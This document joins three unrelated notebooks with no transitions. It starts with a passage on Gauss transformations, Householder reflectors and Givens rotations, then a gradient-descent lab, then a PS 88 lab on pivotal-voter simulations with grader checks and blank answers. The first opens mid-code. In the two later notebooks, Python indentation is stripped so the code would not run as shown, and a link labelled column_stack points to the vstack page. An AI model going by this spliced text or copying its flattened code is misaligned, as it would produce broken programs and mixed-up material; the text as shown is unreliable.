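e1 = np.array([1., 0., 0.])
e2 = np.array([0., 1., 0.])

# L1 zeros out the first column of A below the pivot a_11
l1 = np.array([0., A[1, 0] / A[0, 0], A[2, 0] / A[0, 0]])
L1 = np.eye(3) - np.outer(l1, e1)
A1 = L1 @ A

# L2 zeros out the second column of A1 below the pivot a^(1)_22
l2 = np.array([0., 0., A1[2, 1] / A1[1, 1]])
L2 = np.eye(3) - np.outer(l2, e2)
A2 = L2 @ A1
print(A2)    # upper triangular (up to rounding)
```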
(MATORTMATCOLORTONO)=
## Orthogonal matrix and matrix with orthonormal columns
A set of vectors $\{x_1, \dots, x_p\}$ in $\mathbb{R}^m$ ($x_i \in \mathbb{R}^m$) is orthogonal if $x_i^Tx_j=0$ $\forall i\neq j$. For example, for a set of $2$ vectors $x_1,x_2$ in $\mathbb{R}^3$ this can be visualized as:
<img src="https://dl.dropboxusercontent.com/s/cekagqnxe0grvu4/vectores_ortogonales.png?dl=0" heigth="550" width="550">
(TREF)=
## Reflection transformations
In this section we assume that $A \in \mathbb{R}^{m \times n}$ is a matrix with entries $a_{ij} \in \mathbb{R}$ for all $i=1,2,\dots,m$, $j=1, 2, \dots, n$.
### Householder reflectors
A drawing that helps to visualize the elementary reflector about $u^\perp$, in which $u \in \mathbb{R}^m - \{0\}$, $||u||_2 = 1$ and $R=I_m-2 u u^T$, is the following:
<img src="https://dl.dropboxusercontent.com/s/o3oht181nm8lfit/householder_drawing.png?dl=0" heigth="350" width="350">
Householder reflections can be used to zero out the entries below a given entry of a vector.
### Example: applying Householder reflectors to a vector
Consider the vector $x=(1,2,3)^T$. Define a Householder reflector that zeros out the entries below $x_1$.
We use the definition $v=x-||x||_2e_1$, with $e_1=(1,0,0)^T$ the canonical vector, to build the Householder vector:
We zero out the entries below the first entry of $x$ by performing the matrix-vector multiplication $Rx$:
The result of $Rx$ is $(||x||_2,0,0)^T$, with $||x||_2$ given by:
Below it is shown that the product $Rx$, computed by building $R$ explicitly, is equivalent to the above:
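The original code cells are not included here; a minimal NumPy sketch of this example follows. With an unnormalized Householder vector $v$, the reflector is $R = I - 2\frac{vv^T}{v^Tv}$ and can be applied without forming $R$:
```
import numpy as np

x = np.array([1., 2., 3.])
e1 = np.array([1., 0., 0.])

v = x - np.linalg.norm(x) * e1                 # Householder vector, first definition
Rx = x - 2 * (v @ x) / (v @ v) * v             # apply R = I - 2 v v^T / (v^T v) implicitly
print(Rx)                                      # approximately (||x||_2, 0, 0)

R = np.eye(3) - 2 * np.outer(v, v) / (v @ v)   # explicit reflector, for comparison
print(R @ x)
```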
### Example: applying Householder reflectors to a vector (second definition)
Consider the same vector $x$ as in the previous example and the same goal: "Define a Householder reflector that zeros out the entries below $x_1$." Another option for building the Householder vector is $v=x+||x||_2e_1$, with $e_1=(1,0,0)^T$ the canonical vector:
We zero out the entries below the first entry of $x$ by performing the matrix-vector multiplication $Rx$:
### Which definition of the Householder vector should we use?
With either of the two definitions of the Householder vector, $v=x \pm ||x||_2 e_1$, the multiplication $Rx$ reflects $x$ onto the first coordinate axis (since $e_1$ is used):
<img src="https://dl.dropboxusercontent.com/s/bfk7gojxm93ah5s/householder_2_posibilites.png?dl=0" heigth="400" width="400">
The vector $v^+ = - u_0^+ = x-||x||_2e_1$ reflects $x$ with respect to the subspace $H^+$ (which in the drawing is a line through the origin). The vector $v^- = -u_0^- = x+||x||_2e_1$ reflects $x$ with respect to the subspace $H^-$.
To reduce rounding errors and avoid the cancellation problem in floating-point arithmetic (see [Sistema de punto flotante](https://itam-ds.github.io/analisis-numerico-computo-cientifico/I.computo_cientifico/1.2/Sistema_de_punto_flotante.html)), the following definition is used:
$$v = x+\text{sign}(x_1)||x||_2e_1$$
where $\text{sign}(x_1) = \begin{cases}
1 &\text{ if } x_1 \geq 0 ,\\
-1 &\text{ if } x_1 < 0
\end{cases}.$
The idea behind this definition with the $\text{sign}(\cdot)$ function is that the reflection (in the drawing above, $-||x||_2e_1$ or $||x||_2e_1$) should be as far away as possible from $x$. In the drawing above, since $x_1, x_2>0$, the reflection is taken with respect to the subspace $H^-$, so the reflection equals $-||x||_2e_1$.
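A small sketch of this numerically robust choice of the Householder vector (reusing the unnormalized-reflector formula from the previous sketch):
```
import numpy as np

def householder_vector(x):
    """Sketch: v = x + sign(x_1) * ||x||_2 * e_1, avoiding cancellation in v_1."""
    v = np.array(x, dtype=float)
    sign_x1 = 1.0 if x[0] >= 0 else -1.0
    v[0] += sign_x1 * np.linalg.norm(x)
    return v

x = np.array([1., 2., 3.])
v = householder_vector(x)
Rx = x - 2 * (v @ x) / (v @ v) * v
print(Rx)    # approximately (-||x||_2, 0, 0), since x_1 >= 0
```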
### Example: applying Householder reflectors to a matrix
Householder reflections are used to zero out the entries below the **diagonal** of a matrix and obtain an upper triangular form (the same goal as with Gauss transformations, see {ref}`Example: applying Gauss transformations to a matrix <EG2>`). For example, if the entries below $a_{11}$ have already been zeroed out and we want to zero out the entries below $a_{22}^{(1)}$:
$$\begin{array}{l}
R_2A^{(1)} = R_2
\left[
\begin{array}{cccc}
* & * & * & *\\
0 & * & * & *\\
0 & * & * & * \\
0 & * & * & * \\
0 & * & * & *
\end{array}
\right]
=
\left[
\begin{array}{cccc}
* & * & * & *\\
0 & * & * & *\\
0 & 0 & * & * \\
0 & 0 & * & * \\
0 & 0 & * & *
\end{array}
\right]
:= A^{(2)}
\end{array}
$$
where $a^{(1)}_{ij}$ are the entries of $A^{(1)} = R_1A^{(0)}$, $A^{(0)}=A$, and $R_1$ is a Householder reflection matrix.
In this case
$$R_2 =
\left [
\begin{array}{cc}
1 & 0 \\
0 & \hat{R_2}
\end{array}
\right ]
$$
with $\hat{R}_2$ a Householder reflection matrix that zeros out the entries below $a_{22}^{(1)}$. The matrix $R_2$ has the following properties:
* It does not modify the first row of $A^{(1)}$.
* It does not destroy the zeros in the first column of $A^{(1)}$.
* $R_2$ is a Householder reflection matrix.
Consider the matrix $A \in \mathbb{R}^{4 \times 3}$:
$$A =
\left [
\begin{array}{ccc}
3 & 2 & -1 \\
2 & 3 & 2 \\
-1 & 2 & 3 \\
2 & 1 & 4
\end{array}
\right ]
$$
and apply Householder reflections to bring it to an upper triangular form.
**Next we want to zero out the entries below the second entry of the second column of $A^{(1)}$.**
**Next we want to zero out the entries below the third entry of the third column of $A^{(2)}$.**
Then it only remains to put the rows and columns in place to obtain the matrix $A^{(3)}$. For this we combine columns and rows in *numpy* with [column_stack](https://numpy.org/doc/stable/reference/generated/numpy.vstack.html) and *row_stack*:
The matrix $A^{(3)} = R_3 R_2 R_1 A^{(0)}$ is:
We can verify the above by comparing with the matrix $R$ of the $QR$ factorization of $A$:
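A sketch of that check with `np.linalg.qr` (its $R$ factor may differ from the Householder construction above by the signs of some rows):
```
import numpy as np

A = np.array([[ 3., 2., -1.],
              [ 2., 3.,  2.],
              [-1., 2.,  3.],
              [ 2., 1.,  4.]])

Q, R = np.linalg.qr(A)         # reduced QR: R is 3 x 3 and upper triangular
print(R)
print(np.allclose(Q @ R, A))   # True
```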
(TROT)=
## Rotation transformations
In this section we assume that $A \in \mathbb{R}^{m \times n}$ is a matrix with entries $a_{ij} \in \mathbb{R}$ for all $i=1,2,\dots,m$, $j=1, 2, \dots, n$.
If $u, v \in \mathbb{R}^2-\{0\}$ with $\ell = ||u||_2 = ||v||_2$, and we want to rotate the vector $u$ counterclockwise by an angle $\theta$ to bring it to the direction of $v$:
<img src="https://dl.dropboxusercontent.com/s/vq8eu0yga2x7cb2/rotation_1.png?dl=0" heigth="500" width="500">
From the figure, since $\cos(\phi)=\frac{u_1}{\ell}$ and $\sin(\phi)=\frac{u_2}{\ell}$, we have $v_1 = (\cos\theta)u_1-(\sin\theta)u_2$ and $v_2=(\sin\theta)u_1+(\cos\theta)u_2$, or equivalently:
$$\begin{array}{l}
\left[\begin{array}{c}
v_1\\
v_2
\end{array}
\right]
=
\left[ \begin{array}{cc}
\cos\theta & -\sin\theta\\
\sin\theta & \cos\theta
\end{array}
\right] \cdot
\left[\begin{array}{c}
u_1\\
u_2
\end{array}
\right]
\end{array}
$$
### Example: applying Givens rotations to a vector
Rotate the vector $v=(1,1)^T$ by an angle of $45^o$ **counterclockwise**.
The matrix $R_O$ is:
$$R_O = \left[ \begin{array}{cc}
\cos(\frac{\pi}{4}) & -\sin(\frac{\pi}{4})\\
\sin(\frac{\pi}{4}) & \cos(\frac{\pi}{4})
\end{array}
\right ]
$$
In the previous example, the entry $v_1$ of $v$ was made zero. Rotation matrices are used to zero out entries of a vector. For example, if $v=(v_1,v_2)^T$ and **we want to zero out the entry $v_2$ of $v$**, the following rotation matrix can be used:
$$R_O = \left[ \begin{array}{cc}
\frac{v_1}{\sqrt{v_1^2+v_2^2}} & \frac{v_2}{\sqrt{v_1^2+v_2^2}}\\
-\frac{v_2}{\sqrt{v_1^2+v_2^2}} & \frac{v_1}{\sqrt{v_1^2+v_2^2}}
\end{array}
\right ]
$$
since:
$$\begin{array}{l}
\left[ \begin{array}{cc}
\frac{v_1}{\sqrt{v_1^2+v_2^2}} & \frac{v_2}{\sqrt{v_1^2+v_2^2}}\\
-\frac{v_2}{\sqrt{v_1^2+v_2^2}} & \frac{v_1}{\sqrt{v_1^2+v_2^2}}
\end{array}
\right ] \cdot
\left[\begin{array}{c}
v_1\\
v_2
\end{array}
\right]=
\left[ \begin{array}{c}
\frac{v_1^2+v_2^2}{\sqrt{v_1^2+v_2^2}}\\
\frac{-v_1v_2+v_1v_2}{\sqrt{v_1^2+v_2^2}}
\end{array}
\right ]
=
\left[ \begin{array}{c}
\frac{v_1^2+v_2^2}{\sqrt{v_1^2+v_2^2}}\\
0
\end{array}
\right ]=
\left[ \begin{array}{c}
||v||_2\\
0
\end{array}
\right ]
\end{array}
$$
And defining $\cos(\theta)=\frac{v_1}{\sqrt{v_1^2+v_2^2}}, \sin(\theta)=\frac{v_2}{\sqrt{v_1^2+v_2^2}}$ we have:
$$
R_O=\left[ \begin{array}{cc}
\cos\theta & \sin\theta\\
-\sin\theta & \cos\theta
\end{array}
\right]
$$
In the previous example, since $v=(1,1)^T$, we have $\cos(\theta)=\frac{1}{\sqrt{2}}, \sin(\theta)=\frac{1}{\sqrt{2}}$, so $\theta=\frac{\pi}{4}$ and:
$$
R_O=\left[ \begin{array}{cc}
\frac{1}{\sqrt{2}} & \frac{1}{\sqrt{2}}\\
-\frac{1}{\sqrt{2}} & \frac{1}{\sqrt{2}}
\end{array}
\right]
$$
which is a rotation matrix for an angle that rotates **clockwise**.
To **zero out the entry $v_1$ of $v$** we must use:
$$\begin{array}{l}
R_O=\left[ \begin{array}{cc}
\cos\theta & -\sin\theta\\
\sin\theta & \cos\theta
\end{array}
\right]
=\left[ \begin{array}{cc}
\frac{1}{\sqrt{2}} & -\frac{1}{\sqrt{2}}\\
\frac{1}{\sqrt{2}} & \frac{1}{\sqrt{2}}
\end{array}
\right]
\end{array}
$$
which is a rotation matrix for an angle that rotates **counterclockwise**.
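A NumPy sketch of both rotations applied to $v=(1,1)^T$ (the original code cells are not included in this excerpt):
```
import numpy as np

v = np.array([1., 1.])
c = v[0] / np.linalg.norm(v)    # cos(theta) = 1/sqrt(2)
s = v[1] / np.linalg.norm(v)    # sin(theta) = 1/sqrt(2)

R_zero_v2 = np.array([[ c,  s],
                      [-s,  c]])   # clockwise rotation: zeros out v_2
R_zero_v1 = np.array([[ c, -s],
                      [ s,  c]])   # counterclockwise rotation: zeros out v_1

print(R_zero_v2 @ v)   # approximately (||v||_2, 0)
print(R_zero_v1 @ v)   # approximately (0, ||v||_2)
```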
### Example: applying Givens rotations to a matrix
Givens rotations make it possible to zero out **selected** entries of a matrix. For example, if we want to zero out the entry $x_4$ of $x \in \mathbb{R}^4$, we define $\cos\theta = \frac{x_2}{\sqrt{x_2^2 + x_4^2}}, \sin\theta = \frac{x_4}{\sqrt{x_2^2 + x_4^2}}$ and
$$
R_{24}^\theta=
\left [
\begin{array}{cccc}
1 & 0 & 0 & 0\\
0 & \cos\theta & 0 & \sin\theta \\
0 & 0 & 1 & 0 \\
0 & -\sin\theta & 0 & \cos\theta
\end{array}
\right ]
$$
then:
$$
R_{24}^\theta x =
\begin{array}{l}
\left [
\begin{array}{cccc}
1 & 0 & 0 & 0\\
0 & \cos\theta & 0 & \sin\theta \\
0 & 0 & 1 & 0 \\
0 & -\sin\theta & 0 & \cos\theta
\end{array}
\right ]
\left [
\begin{array}{c}
x_1 \\
x_2 \\
x_3 \\
x_4
\end{array}
\right ]
=
\left [
\begin{array}{c}
x_1 \\
\sqrt{x_2^2 + x_4^2} \\
x_3 \\
0
\end{array}
\right ]
\end{array}
$$
And we say that a rotation was performed in the $(2,4)$ plane.
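A sketch of a rotation in the $(2,4)$ plane with NumPy, using an arbitrary vector $x \in \mathbb{R}^4$:
```
import numpy as np

x = np.array([4., 1., -2., 2.])
r = np.hypot(x[1], x[3])        # sqrt(x_2^2 + x_4^2)
c, s = x[1] / r, x[3] / r       # cos(theta), sin(theta)

R24 = np.eye(4)
R24[1, 1], R24[1, 3] = c, s
R24[3, 1], R24[3, 3] = -s, c

print(R24 @ x)    # (x_1, sqrt(x_2^2 + x_4^2), x_3, 0)
```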
Consider the matrix $A \in \mathbb{R}^{4 \times 4}$:
$$A =
\left [
\begin{array}{cccc}
4 & 1 & -2 & 2 \\
1 & 2 & 0 & 1\\
-2 & 0 & 3 & -2 \\
2 & 1 & -2 & -1
\end{array}
\right ]
$$
and apply Givens rotations to zero out the entries below the diagonal of $A$ and obtain an **upper triangular** matrix (a compact NumPy sketch of the full sequence of rotations follows below).
**Entry $a_{21}$, plane $(1,2)$:**
We make a copy for easier handling of the indices and the modified matrices. We could also use [numpy.view](https://numpy.org/doc/stable/reference/generated/numpy.ndarray.view.html).
**Entry $a_{31}$, plane $(1,3)$:**
**Entry $a_{41}$, plane $(1,4)$:**
**Entry $a_{32}$, plane $(2,3)$:**
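The code cells that carry out these rotations are not included in this excerpt; the following compact sketch loops over the entries below the diagonal in the same column-by-column order, and its result can be compared with the $R$ factor of `np.linalg.qr(A)` up to row signs:
```
import numpy as np

A = np.array([[ 4., 1., -2.,  2.],
              [ 1., 2.,  0.,  1.],
              [-2., 0.,  3., -2.],
              [ 2., 1., -2., -1.]])

A_k = A.copy()
m = A_k.shape[0]
for j in range(m - 1):            # columns, left to right
    for i in range(j + 1, m):     # entries below the diagonal
        if A_k[i, j] != 0:
            r = np.hypot(A_k[j, j], A_k[i, j])
            c, s = A_k[j, j] / r, A_k[i, j] / r
            G = np.eye(m)
            G[j, j], G[j, i] = c, s
            G[i, j], G[i, i] = -s, c
            A_k = G @ A_k         # rotation in the (j+1, i+1) plane
print(np.round(A_k, 4))           # upper triangular
```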
<a href="https://colab.research.google.com/github/BenM1215/udacity-intro-pytorch/blob/master/GradientDescent.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Implementing the Gradient Descent Algorithm
In this lab, we'll implement the basic functions of the Gradient Descent algorithm to find the boundary in a small dataset. First, we'll start with some functions that will help us plot and visualize the data.
```
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
#Some helper functions for plotting and drawing lines
def plot_points(X, y):
admitted = X[np.argwhere(y==1)]
rejected = X[np.argwhere(y==0)]
plt.scatter([s[0][0] for s in rejected], [s[0][1] for s in rejected], s = 25, color = 'blue', edgecolor = 'k')
plt.scatter([s[0][0] for s in admitted], [s[0][1] for s in admitted], s = 25, color = 'red', edgecolor = 'k')
def display(m, b, color='g--'):
plt.xlim(-0.05,1.05)
plt.ylim(-0.05,1.05)
x = np.arange(-10, 10, 0.1)
plt.plot(x, m*x+b, color)
```
## Reading and plotting the data
```
data = pd.read_csv('https://raw.githubusercontent.com/udacity/deep-learning-v2-pytorch/master/intro-neural-networks/gradient-descent/data.csv', header=None)
X = np.array(data[[0,1]])
y = np.array(data[2])
plot_points(X,y)
plt.show()
```
## TODO: Implementing the basic functions
Now it's your turn to shine. Implement the following formulas, as explained in the text.
- Sigmoid activation function
$$\sigma(x) = \frac{1}{1+e^{-x}}$$
- Output (prediction) formula
$$\hat{y} = \sigma(w_1 x_1 + w_2 x_2 + b)$$
- Error function
$$Error(y, \hat{y}) = - y \log(\hat{y}) - (1-y) \log(1-\hat{y})$$
- The function that updates the weights
$$ w_i \longrightarrow w_i + \alpha (y - \hat{y}) x_i$$
$$ b \longrightarrow b + \alpha (y - \hat{y})$$
```
# Implement the following functions
# Activation (sigmoid) function
def sigmoid(x):
sig_x = 1./(1.+np.exp(-x))
return sig_x
# Output (prediction) formula
def output_formula(features, weights, bias):
return sigmoid(np.dot(features, weights) + bias)
# Error (log-loss) formula
def error_formula(y, output):
E = -y*np.log(output) - (1-y)*np.log(1-output)
return E
# Gradient descent step
def update_weights(x, y, weights, bias, learnrate):
output = output_formula(x, weights, bias)
d_error = y - output
weights += learnrate * d_error * x
bias += learnrate * d_error
return weights, bias
```
## Training function
This function will help us iterate the gradient descent algorithm through all the data, for a number of epochs. It will also plot the data, and some of the boundary lines obtained as we run the algorithm.
```
np.random.seed(44)
epochs = 100
learnrate = 0.01
def train(features, targets, epochs, learnrate, graph_lines=False):
errors = []
n_records, n_features = features.shape
last_loss = None
weights = np.random.normal(scale=1 / n_features**.5, size=n_features)
bias = 0
for e in range(epochs):
del_w = np.zeros(weights.shape)
for x, y in zip(features, targets):
output = output_formula(x, weights, bias)
error = error_formula(y, output)
weights, bias = update_weights(x, y, weights, bias, learnrate)
# Printing out the log-loss error on the training set
out = output_formula(features, weights, bias)
loss = np.mean(error_formula(targets, out))
errors.append(loss)
if e % (epochs / 10) == 0:
print("\n========== Epoch", e,"==========")
if last_loss and last_loss < loss:
print("Train loss: ", loss, " WARNING - Loss Increasing")
else:
print("Train loss: ", loss)
last_loss = loss
predictions = out > 0.5
accuracy = np.mean(predictions == targets)
print("Accuracy: ", accuracy)
if graph_lines and e % (epochs / 100) == 0:
display(-weights[0]/weights[1], -bias/weights[1])
# Plotting the solution boundary
plt.title("Solution boundary")
display(-weights[0]/weights[1], -bias/weights[1], 'black')
# Plotting the data
plot_points(features, targets)
plt.show()
# Plotting the error
plt.title("Error Plot")
plt.xlabel('Number of epochs')
plt.ylabel('Error')
plt.plot(errors)
plt.show()
```
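The call `display(-weights[0]/weights[1], -bias/weights[1])` plots the current decision boundary as a line; its slope and intercept come from setting the argument of the sigmoid to zero:
$$w_1 x_1 + w_2 x_2 + b = 0 \;\Longrightarrow\; x_2 = -\frac{w_1}{w_2} x_1 - \frac{b}{w_2}$$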
## Time to train the algorithm!
When we run the function, we'll obtain the following:
- 10 updates with the current training loss and accuracy
- A plot of the data and some of the boundary lines obtained. The final one is in black. Notice how the lines get closer and closer to the best fit, as we go through more epochs.
- A plot of the error function. Notice how it decreases as we go through more epochs.
```
train(X, y, epochs*10, learnrate, True)
```
```
# Initialize Otter
import otter
grader = otter.Notebook("PS88_lab_week3.ipynb")
```
# PS 88 Week 3 Lab: Simulations and Pivotal Voters
```
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from datascience import Table
from ipywidgets import interact
%matplotlib inline
```
## Part 1: Plotting expected utility
We can use Python to do expected utility calculations and explore the relationship between parameters in decision models and optimal choices.
In class we showed that the expected utility for voting for a preferred candidate can be written $p_1 b - c$. A nice way to do calculations like this is to first assign values to the variables:
```
p1=.6
b=100
c=2
p1*b-c
```
**Question 1.1. Write code to compute the expected utility of voting when $p_1 = .5$, $b=50$, and $c=.5$.**
```
#Answer to 1.1 here
p1=.5
b=50
c=.5
p1*b-c
```
We don't necessarily care about these expected utilities on their own, but rather how they compare to the expected utility of abstaining.
**Question 1.2. If $b=50$ and $p_0 = .48$, write code to compute the expected utility of abstaining.**
```
# Code for 1.2 here
p0=.48
b=50
p0*b
```
**Question 1.3. Given 1.1 and 1.2, is voting the expected utility maximizing choice given these parameters?**
Answer to 1.3 here
We can also use the graphic capabilities of Python to learn more about how these models work.
```
plt.hlines(p0*b, 0,1, label='Abstaining Utility')
import matplotlib.pyplot as plt
import numpy as np
from ipywidgets import interact, IntSlider, FloatSlider
def plotEU(b):
plt.hlines(p0*b, 0,2, label='Abstaining Utility')
c = np.arange(0,2, step=.01)
y = p1*b-c
plt.ticklabel_format(style='plain')
plt.xticks(rotation=45)
plt.plot(c,y, label='Voting Expected Utility')
# plt.vlines(no_lobbying+1e7-1e5*p, -2e7, 0, linestyles="dashed")
plt.xlabel('Voting Cost')
plt.ylabel('Expected Utility')
plt.legend()
interact(plotEU, b=IntSlider(min=0,max=300, value=100))
```
## Part 2: Simulating votes
How can we estimate the probability of a vote mattering? One route is to use probability theory, which in realistic settings (like the electoral college in the US) requires lots of complicated mathematical manipulation. Another way, which will often be faster and uses the tools you are learning in Data 8, is to run simulations.
As we will see throughout the class, simulation is an incredibly powerful tool that can be used for many purposes. For example, later in the class we will use simulation to see how different causal processes can produce similar data.
For now, we are going to use simulation to simulate the probability a vote matters. The general idea is simple. We will create a large number of "fake electorates" with parameters and randomness that we control, and then see how often an individual vote matters in these simulations.
Before we get to voting, let's do a simple exercise as warmup. Suppose we want to simulate flipping a coin 10 times. To do this we can use the `random.binomial` function from `numpy` (imported above as `np`). This function takes two arguments: the number of flips (`n`) and the probability that a flip is "heads" (`p`). More generally, we often call $n$ the number of "trials" and $p$ the probability of "success".
The following line of code simulates flipping a "fair" (i.e., $p=.5$) coin 10 times. Run it a few times.
```
# First number argument is the number of times to flip, the second is the probability of a "heads"
np.random.binomial(n=10, p=.5)
```
We can simulate 100 coin flips at a time by changing the `n` argument to 100:
```
np.random.binomial(n=100, p=.5)
```
In the 2020 election, about 158.4 million people voted. This is a big number to have to keep typing, so let's define a variable:
```
voters2020 = 158400000
```
**Question 2a. Write a line of code to simulate 158.4 million people flipping a coin and counting how many heads there are.**
<!--
BEGIN QUESTION
name: q2a
-->
```
# Code for 2a here
sim = ...
sim
grader.check("q2a")
```
Of course, we don't care about coin flipping per se, but we can think about this as the number of "yes" votes if we have $n$ people who each vote for a candidate with probability $p$. In the 2020 election, about 51.3% of the voters voted for Joe Biden. Let's do a simulated version of the election by running `np.random.binomial` with 158.4 million trials (`voters2020`) and a probability of "success" of 51.3%.
**Question 2b. Write code for this trial**
<!--
BEGIN QUESTION
name: q2b
-->
```
# Code for 2b
joe_count = ...
joe_count
grader.check("q2b")
```
<!-- BEGIN QUESTION -->
In reality, Biden won 81.3 million votes.
**Question 2c. How close was your answer to the real election? Compare this to the cases where you flipped 10 coins at a time.**
<!--
BEGIN QUESTION
name: q2c
manual: true
-->
_Type your answer here, replacing this text._
<!-- END QUESTION -->
## Part 3. Pivotal votes.
Suppose that you are a voter in a population with 10 other people, each of whom is equally likely to vote for candidate A or candidate B, and you prefer candidate A. If you turn out to vote, you will be pivotal if those other 10 are split evenly between the two candidates. How often will this happen?
We can answer this question by running a whole bunch of simulations where we effectively flip 10 coins and count how many heads there are.
The following line runs the code to do 10 coin flips with `p=.5` 10,000 times, and stores the results in an array. (Don't worry about the details here: we will cover how to write "loops" like this later.)
```
ntrials=10000
trials10 = [np.random.binomial(n=10, p=.5) for _ in range(ntrials)]
```
Here is the output:
```
trials10
```
Let's put these in a table, and then make a histogram to see how often each number of heads occurs. To make sure we just get a count of how many trials land in each interval, we need to get the "bins" right.
```
list(range(11))
simtable = Table().with_column("sims10",trials10)
simtable.hist("sims10", bins=range(11))
```
Let's see what happens with 20 coin flips. First we create a bunch of simulations:
```
trials20 = [np.random.binomial(n=20, p=.5) for _ in range(ntrials)]
```
And then add the new trials to `simtable` using the `.with_column()` function.
```
simtable=simtable.with_column("sims20", trials20)
simtable
```
<!-- BEGIN QUESTION -->
**Question 3.1 Make a histogram of the number of heads in the trials with 20 flips. Make sure to set the bins so that each one contains exactly one integer.**
<!--
BEGIN QUESTION
name: q3a
manual: true
-->
```
...
```
<!-- END QUESTION -->
Let's see what this looks like with a different probability of success. Here is a set of trials with 10 flips each and a higher probability of success ($p = .7$):
```
trials_high = [np.random.binomial(n=10, p=.7) for _ in range(ntrials)]
```
<!-- BEGIN QUESTION -->
**Question 3.2. Add this array to `simtable`, as a variable called `sims_high`, and create a histogram which shows the frequency of heads in these trials**
<!--
BEGIN QUESTION
name: q3b
manual: true
-->
```
simtable= ...
...
```
<!-- END QUESTION -->
```
simtable
```
<!-- BEGIN QUESTION -->
**Question 3.3. Compare this to the graph where $p=.5$**
<!--
BEGIN QUESTION
name: q3c
manual: true
-->
_Type your answer here, replacing this text._
<!-- END QUESTION -->
Next we want to figure out exactly how often a voter is pivotal in different situations. To do this, let's create a variable called `pivot10` which is true when there are exactly 5 other voters choosing each candidate.
```
simtable = simtable.with_column("pivot10", simtable.column("sims10")==5)
simtable
```
We can then count the number of trials where a voter was pivotal.
```
sum(simtable.column("pivot10"))
```
Since there were 10,000 trials, we can convert this into a proportion:
```
sum(simtable.column("pivot10"))/ntrials
```
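As a sanity check (a short sketch, not part of the lab's required answers), the exact probability of a 5-5 split among 10 independent voters with $p=.5$ is given by the binomial formula and should be close to the simulated proportion above:
```
from math import comb

# Exact probability that exactly 5 of 10 independent voters (each p = .5) choose A
exact = comb(10, 5) * 0.5**10
exact    # about 0.246
```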
**Question 3.4. Write code to determine what proportion of the time a voter is pivotal when $n=20$**
<!--
BEGIN QUESTION
name: q3d
-->
```
simtable= ...
pivotal_freq = ...
pivotal_freq
grader.check("q3d")
```
To explore how changing the size of the electorate and the probabilities of voting affect the probability of being pivotal without having to go through all of these steps, we will define a function which does one simulation and then checks whether a new voter would be pivotal.
```
def one_pivot(n,p):
return 1*(np.random.binomial(n=n,p=p)==n/2)
```
Run this a few times.
```
one_pivot(n=10, p=.6)
```
Let's see how the probability of being pivotal changes with a higher $n$. To do so, we use the same looping trick to aggregate 10,000 simulations with $n=100$. (Note we defined `ntrials=10000` above.)
```
def pivotal_prob(p):
    return sum(one_pivot(n=100, p=p) for _ in range(ntrials))/ntrials
interact(pivotal_prob, p=(0,1, .1))
```
Or a lower p
```
piv_trials100 = [one_pivot(n=100, p=.4) for _ in range(ntrials)]
sum(piv_trials100)/ntrials
```
**Question 3.5 Write a line of code to simulate how often a voter will be pivotal in an electorate with 50 voters and $p=.55$**
<!--
BEGIN QUESTION
name: q3e
-->
```
piv_trials35 = ...
pivotal_freq = ...
pivotal_freq
grader.check("q3e")
```
<!-- BEGIN QUESTION -->
**Question 3.6 (Optional) Try running the one_pivot function with an odd number of voters. What happens and why?**
<!--
BEGIN QUESTION
name: q
manual: true
-->
```
...
```
<!-- END QUESTION -->
## Part 4. Pivotal votes with groups
To learn about situations like the electoral college, let's do a simulation with groups. Imagine there are three groups, each of which makes its choice by majority vote. The winning candidate is the one who wins a majority vote in a majority of the groups, in this case at least two groups.
Questions like this become interesting when the groups vary, maybe in size or in predisposition towards certain candidates. To get started, we will look at an example where all the groups have 50 voters. Group 1 leans against candidate A, group 2 is split, and group 3 leans towards candidate A.
We start by making a table with the number of votes for candidate A in each group. All groups have 50 members, but they have different probabilities of voting for A.
```
#Group sizes
n1=50
n2=50
n3=50
# Probability of voting for A, by group
p1=.4
p2=.5
p3=.6
np.random.seed(88)
# Creating arrays for simulations for each group
group1 = [np.random.binomial(n=n1, p=p1) for _ in range(ntrials)]
group2 = [np.random.binomial(n=n2, p=p2) for _ in range(ntrials)]
group3 = [np.random.binomial(n=n3, p=p3) for _ in range(ntrials)]
#Putting the arrays into a table
grouptrials = Table().with_columns("votes1",group1,
"votes2", group2,
"votes3",group3)
grouptrials
```
Next we create a variable to check whether an individual voter would be pivotal if placed in each group.
```
grouptrials = grouptrials.with_columns("voter piv1", 1*(grouptrials.column("votes1")==n1/2),
"voter piv2", 1*(grouptrials.column("votes2")==n2/2),
"voter piv3", 1*(grouptrials.column("votes3")==n3/2))
grouptrials
```
Let's check how often voters in group 1 are pivotal
```
sum(grouptrials.column("voter piv1"))/ntrials
```
**Question 4a. Check how often voters in groups 2 and 3 are pivotal.**
<!--
BEGIN QUESTION
name: q4a
-->
```
group2pivotal = ...
group3pivotal = ...
group2pivotal, group3pivotal
grader.check("q4a")
```
<!-- BEGIN QUESTION -->
**Question: you should get that two of the groups have a similar probability of being pivotal, but one is different. Which is different and why?**
<!--
BEGIN QUESTION
name: q4b
manual: true
-->
_Type your answer here, replacing this text._
<!-- END QUESTION -->
Now let's check if each group is pivotal, i.e., if the group changing their vote changes which candidate wins the majority of groups. [Note: tricky stuff about ties here is important]
```
group1piv = 1*((grouptrials.column("votes2") <= n2/2)*(grouptrials.column("votes3") >= n3/2)+
(grouptrials.column("votes2") >= n2/2)*(grouptrials.column("votes3") <= n3/2))
group2piv = 1*((grouptrials.column("votes1") <= n1/2)*(grouptrials.column("votes3") >= n3/2)+
              (grouptrials.column("votes1") >= n1/2)*(grouptrials.column("votes3") <= n3/2))
group3piv = 1*((grouptrials.column("votes1") <= n1/2)*(grouptrials.column("votes2") >= n2/2)+
              (grouptrials.column("votes1") >= n1/2)*(grouptrials.column("votes2") <= n2/2))
grouptrials = grouptrials.with_columns("group piv1", group1piv,
"group piv2", group2piv,
"group piv3", group3piv)
grouptrials
```
**How often is each group pivotal?**
<!--
BEGIN QUESTION
name: q4c
-->
```
group1_pivotal_rate = ...
group2_pivotal_rate = ...
group3_pivotal_rate = ...
group1_pivotal_rate, group2_pivotal_rate, group3_pivotal_rate
grader.check("q4c")
```
<!-- BEGIN QUESTION -->
<!--
BEGIN QUESTION
name: q4d
manual: true
-->
**Two groups should have similar probabilities, with one group fairly different. Why is this the case?**
_Type your answer here, replacing this text._
<!-- END QUESTION -->
